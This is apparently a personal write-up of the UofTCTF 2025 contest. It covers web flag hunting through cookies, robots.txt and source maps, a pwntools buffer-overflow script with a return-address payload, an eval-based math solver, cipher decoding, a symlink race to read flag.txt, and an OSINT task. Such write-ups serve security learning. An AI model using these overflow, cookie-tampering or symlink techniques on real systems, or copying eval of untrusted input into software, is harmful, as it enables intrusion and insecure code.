UofTCTF 2025 writeup === [TOC] ## My Score 700 points 233/897 teams total ![image](https://hackmd.io/_uploads/rkpZlmzPkg.png) I am glade that I did my best, and I learned a lot\^_^ ## Sanity Check >just look at the dircord server and can see the flag >![image](https://hackmd.io/_uploads/BJl-r7fv1e.png) ## Scavenger Hunt >H12 get part1 ``` <!-- part 1: uoftctf{ju57_k33p_ --> ``` --- >Response Header from Network get part2 ![image](https://hackmd.io/_uploads/r1qBjHJwJg.png) --- >cookie get part3 ![image](https://hackmd.io/_uploads/HyFscr1P1x.png) --- >robots.txt get part4 ``` Disallow: /hidden_admin_panel # part4=411_7h3_ ``` --- >get in **/styles.css** will get part5 ``` /* p_a_r_t_f_i_v_e=4pp5_*/ ``` >get in **/hidden_admin_panel** and **change cookie user to admin** can get part6 --- ![image](https://hackmd.io/_uploads/SJgt3rkvyx.png) --- >We can see **//# sourceMappingURL=app.min.js.map** in app.min.js and get part7 from it ![image](https://hackmd.io/_uploads/HJ5SWvyvJe.png) flag is ``` uoftctf{ju57_k33p_c4lm_4nd_1n5p3c7_411_7h3_4pp5_50urc3_c0d3!!} ``` --- ## Math test use pwntool to solve ``` from pwn import * r=remote("34.66.235.106", 5000) for i in range(1000): r.recvuntil(b'Question:') s=r.recvline() ans=str(int(eval(s))) r.sendlineafter(b'Answer:',ans.encode()) print(r.recvline()) r.interactive() ``` then can get flag ``` uoftctf{7h15_15_b451c_10_7357_d16u153d_45_4_m47h_7357} ``` --- ## Baby Pwn It is a buffer overflow. ``` from pwn import * r=remote("34.162.142.123",5000) r.recvuntil('secret:') add=r.recvline().decode() add=add.replace('\n','') payload=b'a'*64+b'b'*8+b'f\x11@\x00\x00\x00\x00\x00' r.sendline(payload) r.interactive() ``` and get the flag ```uoftctf{buff3r_0v3rfl0w5_4r3_51mp13_1f_y0u_kn0w_h0w_t0_d0_1t}``` --- ## Funny Cipher cipher is ``` 60_ZMZ_GBWKNREM_KRA__LQM}WEPRGQL__Q_{RWW_M_KIAGPMNMRXDLM_FMWLDQ0BOIAMNPG ``` According to the discription,I find out that it is the **Burrows–Wheeler transform** and decipher get ``` LWPMGMP{NRN_XWL_BDWO_MZA_PRIQM_QLKQMRMLMRWD_GRFZAI_NEMAQ_KEGB_MW_600_KG} ``` I use my eyes to do **substitution cipher decode** and get ``` UOFTCTF{DID_YOU_KNOW_THE_FIRST_SUBSTITUTION_CIPHER_DATES_BACK_TO_600_BC} ``` --- ## Racing 1 The chal.c file tell us to make a file name **permitted** ![image](https://hackmd.io/_uploads/ry2qSTeDyg.png) and I use symlink to link **permitted** to **flag.txt** ![image](https://hackmd.io/_uploads/BkUZLTlD1x.png) If our imput=0, it will open **fn (permitted)** and read,and we will get flag.txt ![image](https://hackmd.io/_uploads/S1dHSTxvkl.png) --- ## Surgery >It is an OSINT question ![image](https://hackmd.io/_uploads/ByVFSXMDJg.png) >From the picture I find **JK Plastic Surgery clinic** --- ![image](https://hackmd.io/_uploads/S1qMUQGP1x.png) --- [surgery clinic](https://www.jkplastic.com/en/about-us/our-value/doctors.asp) >The doctor is Kim, Sung-Sik > ```uofctf{Sung-Sik Kim}``` ---